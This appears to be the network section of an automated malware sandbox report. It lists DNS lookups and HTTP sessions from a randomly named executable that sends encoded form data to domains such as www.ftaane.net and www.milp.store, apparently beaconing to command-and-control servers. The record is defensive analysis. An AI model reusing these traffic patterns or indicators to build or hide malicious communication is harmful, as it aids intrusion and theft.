                                                Dec 13, 2024 11:41:21.662540913 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662626982 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662663937 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662740946 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.662889004 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662925005 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662930965 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.662961006 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.663017035 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.663152933 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.663199902 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.666714907 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.786432028 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:27.260855913 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.381062031 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:27.381149054 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.393131971 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.513345957 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479172945 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479288101 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479298115 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479326963 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:28.479345083 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:29.560451984 CET4998080192.168.2.10199.59.243.227
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 11:40:37.101191998 CET6550353192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:38.091720104 CET6550353192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:38.271616936 CET53655031.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:38.271632910 CET53655031.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:54.846268892 CET5329453192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:55.857359886 CET5329453192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:56.685698986 CET53532941.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:56.685811043 CET53532941.1.1.1192.168.2.10
                                                Dec 13, 2024 11:41:11.392446041 CET5510053192.168.2.101.1.1.1
                                                Dec 13, 2024 11:41:12.121771097 CET53551001.1.1.1192.168.2.10
                                                Dec 13, 2024 11:41:26.673376083 CET6122953192.168.2.101.1.1.1
                                                Dec 13, 2024 11:41:27.258270025 CET53612291.1.1.1192.168.2.10
                                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                 Dec 13, 2024 11:40:37.101191998 CET | 192.168.2.10 | 1.1.1.1 | 0xd640 | Standard query (0) | www.tabyscooterrentals.xyz | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.091720104 CET | 192.168.2.10 | 1.1.1.1 | 0xd640 | Standard query (0) | www.tabyscooterrentals.xyz | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:54.846268892 CET | 192.168.2.10 | 1.1.1.1 | 0xfaf5 | Standard query (0) | www.ftaane.net | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:55.857359886 CET | 192.168.2.10 | 1.1.1.1 | 0xfaf5 | Standard query (0) | www.ftaane.net | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:11.392446041 CET | 192.168.2.10 | 1.1.1.1 | 0xff2d | Standard query (0) | www.milp.store | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:26.673376083 CET | 192.168.2.10 | 1.1.1.1 | 0xf704 | Standard query (0) | www.vavada-official.buzz | A (IP address) | IN (0x0001) | false
                                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                 Dec 13, 2024 11:40:38.271616936 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | www.tabyscooterrentals.xyz | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.271616936 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.271616936 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.271632910 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | www.tabyscooterrentals.xyz | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.271632910 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:38.271632910 CET | 1.1.1.1 | 192.168.2.10 | 0xd640 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685698986 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | www.ftaane.net | ftaane.net.milaoshu.buyusdt.me | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685698986 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | ftaane.net.milaoshu.buyusdt.me | milaoshu.buyusdt.me | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685698986 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | milaoshu.buyusdt.me | x103.jieruitech.info | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685698986 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | x103.jieruitech.info | - | 192.197.113.112 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685811043 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | www.ftaane.net | ftaane.net.milaoshu.buyusdt.me | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685811043 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | ftaane.net.milaoshu.buyusdt.me | milaoshu.buyusdt.me | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685811043 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | milaoshu.buyusdt.me | x103.jieruitech.info | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:40:56.685811043 CET | 1.1.1.1 | 192.168.2.10 | 0xfaf5 | No error (0) | x103.jieruitech.info | - | 192.197.113.112 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:12.121771097 CET | 1.1.1.1 | 192.168.2.10 | 0xff2d | No error (0) | www.milp.store | - | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:12.121771097 CET | 1.1.1.1 | 192.168.2.10 | 0xff2d | No error (0) | www.milp.store | - | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:27.258270025 CET | 1.1.1.1 | 192.168.2.10 | 0xf704 | No error (0) | www.vavada-official.buzz | 94950.bodis.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                 Dec 13, 2024 11:41:27.258270025 CET | 1.1.1.1 | 192.168.2.10 | 0xf704 | No error (0) | 94950.bodis.com | - | 199.59.243.227 | A (IP address) | IN (0x0001) | false
                                                • www.tabyscooterrentals.xyz
                                                • www.ftaane.net
                                                • www.milp.store
                                                • www.vavada-official.buzz
                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 0 | 192.168.2.10 | 49867 | 85.159.66.93 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:40:38.409822941 CET | 392 | OUT | GET /4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.tabyscooterrentals.xyz
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                 Dec 13, 2024 11:40:39.732321978 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Fri, 13 Dec 2024 10:40:39 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-12-13T10:40:44.5161501Z


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 1 | 192.168.2.10 | 49908 | 192.197.113.112 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:40:56.830984116 CET | 633 | OUT | POST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Ascii: 6hzlp=2xdNP8xiPuumjrTOV9u181UE2OUK9+ZkPfH8cGGhH+EG+1Rjh9WYVsqniN3pAXky+iFe+AEio5iXJxKTFvrkLJFtOJj6LMusFiMFPa0NPZjNEZxRaH/bpV2g3t+nd5xH/SqE55L4hhy8Vc7KOTyG02UhnbWwiZ0Mrjt2ymgr+O3lqdnPRMURTCJtodlF
                                                 Dec 13, 2024 11:40:58.406092882 CET | 246 | IN | HTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:40:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 2 | 192.168.2.10 | 49918 | 192.197.113.112 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:40:59.495857000 CET | 657 | OUT | POST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 218
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Ascii: 6hzlp=2xdNP8xiPuumiPvOWaS19VUD5uUKzeZgPfL8cHyLHNgG5Uhjg/+YSsqn793ofHk5+i4j+AIio52XJ0uTF+rnNZFvbZicFsusFiMFPbVWPdPNHoBRbjrY3l2/n9+nXZxD/SrR54mfhn28VdLKAhaF+2Unq7XDl4FykRBeyg8gv+zkkcaIAd1GA1VjmbQvrp8sKfzKgKYwropxNkryQw==
                                                 Dec 13, 2024 11:41:01.057383060 CET | 246 | IN | HTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 3 | 192.168.2.10 | 49925 | 192.197.113.112 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:41:02.152693987 CET | 1670 | OUT | POST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 1230
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                 Data Ascii: 6hzlp= [TRUNCATED]
                                                 Dec 13, 2024 11:41:03.754610062 CET | 246 | IN | HTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 4 | 192.168.2.10 | 49931 | 192.197.113.112 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:41:04.809333086 CET | 380 | OUT | GET /8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.ftaane.net
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                 Dec 13, 2024 11:41:06.378410101 CET | 246 | IN | HTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                 5 | 192.168.2.10 | 49947 | 194.9.94.86 | 80 | 2592 | C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                 Timestamp | Bytes transferred | Direction | Data
                                                 Dec 13, 2024 11:41:12.277929068 CET | 633 | OUT | POST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Ascii: 6hzlp=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBueKgziw2IkZ6/vE3lW+AOt5GkLd5
                                                 Dec 13, 2024 11:41:13.564431906 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                 Dec 13, 2024 11:41:13.564450026 CET | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                 Dec 13, 2024 11:41:13.564465046 CET | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:13.564730883 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                Dec 13, 2024 11:41:13.564743996 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                Session ID:6
                                                Source IP:192.168.2.10
                                                Source Port:49957
                                                Destination IP:194.9.94.86
                                                Destination Port:80
                                                PID:2592
                                                Process:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 13, 2024 11:41:15.072442055 CET | 657 | OUT | POST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 218
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 6c 49 71 4e 6f 54 68 4d 37 58 34 43 79 34 41 6c 6a 59 51 43 54 74 63 4a 32 38 43 67 3d 3d
                                                Data Ascii: 6hzlp=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXdalIqNoThM7X4Cy4AljYQCTtcJ28Cg==
                                                Dec 13, 2024 11:41:16.337105036 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:16 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:16.337188005 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:16.337199926 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:16.337482929 CET672INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
